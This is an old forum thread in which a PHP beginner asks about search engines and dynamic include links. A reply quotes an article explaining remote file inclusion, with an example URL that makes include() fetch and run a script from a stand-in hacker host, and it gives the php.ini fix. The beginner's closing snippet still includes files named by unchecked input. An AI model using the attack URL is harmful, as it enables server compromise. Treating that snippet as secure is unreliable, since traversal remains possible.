Page 1 of 1

I decided to go with PHP, but what about search results?

Posted: Wed Apr 07, 2004 11:29 pm
by Aleister
I decided that I am going to use a PHP based solution to handle a large number of files I have. Just something simple. Passing a single parameter which is the name of the file I want to import.

So, If on the page that has the links to all these files.. which will have :

<a href="http://whatever/file.php?id=test1.php">test1</a>
<a href="http://whatever/file.php?id=test2.php">test2</a> etc...

Will search engines follow these links?

Posted: Thu Apr 08, 2004 12:29 am
by kettle_drum
Google is most likely not to, it will just index the file.php. What you want to have is http://whatever/file.php?id=test1.php/ then just parse the / when you see what page you need to load.

I would also suggest just passing "test1" in the url and have the script force ".php" onto the end of the file name to insure that only php files will be included - and also make sure the user can only open files in one directory so they cant traverse and include files with sensitive data.

Posted: Thu Apr 08, 2004 10:07 am
by Aleister
I understand the second part.. for security reasons.
The first part though, will that help the search engines? I don't know much about PHP yet so I am not quite sure what you mean. Thanks.

Posted: Thu Apr 08, 2004 10:12 am
by twigletmac
Google will spider dynamically generated links, however, apparently (can't say for sure but I've heard this said a few times) it doesn't like id as the variable in the URL and won't spider links like those you used in your example.

Mac

Posted: Thu Apr 08, 2004 10:28 am
by code_monkey
As a note, I read an article concerning using include files in this way the other day and regarding possible missuse, you should generally include files local through the file system if possible, see below;
As you may be aware, PHP provides a number of functions for opening files such as 'fopen()' and it's also possible to pass an HTTP or FTP URL to these such that fopen('http://www.somesite.co.uk/'); will fetch the contents of the page for PHP to treat as a file.

What you may not be aware of is that functions such as include() also allow URLs to be passed as their argument. Since these functions cause the included file to be parsed and executed as PHP code, this can be a major security flaw.

Using a PHP file that looks like this:

<html>
...standard header...
<? include($page); ?>
...standard footer...
</html>

as a cheap way to manage common headers and footers. The page would be accessed like so:

http://www.your-domain.co.uk/index.php?page=about.inc

so that a file 'about.inc' is included inside the standard header/footer.

However, unless the $page variable is checked for valid content this is very open to misuse. Malicious third parties could do the following:

http://www.your-domain.co.uk/index.php? ... script.txt

This example would cause http://www.hacker-domain.co.uk/my-root-script.txt to be downloaded and executed as PHP, allowing the hacker to manipulate server files and create backdoors which allow them to log in using telnet or ssh and cause further disruption.

This URL fopen behaviour can be disabled globally by putting the following in php.ini

allow_url_fopen = Off

This configuration change will stop fopen(), include(), and others from opening URLs, and restrict it to local files only.
Hope you find this kind of relevant.

Posted: Thu Apr 08, 2004 12:15 pm
by Aleister
Thanks for the info.. It sounds like this solution will work good for search engines.. I will go ahead and change 'id' to something else.

Now I just need to learn how to secure it better. I liked someones ideas of having the code add on the php extension itself, to make it only open php files.. could the same be done for the directory the files are in? like, could I do something like this? :

open( "www.mysite.com/dir/" + $filename + ".php" )

Thats just a generic example.. not actually php code..

If so, anyone wanna explain really quick how to do that in php? :P as I said I am totally new to it.. I will try to look it up, but if someone wants to be nice and just type it I wont mind lol

Posted: Thu Apr 08, 2004 7:09 pm
by Aleister
I ended up doing this..

Code: Select all

<?php     
$page_location = $lyric . ".php";
if($lyric && file_exists($page_location)) {
     include($page_location);
}
else {
     include("empty.php"); /* gives a link back */
     echo "Error!";
}
?>
any comments? should it be secure enough?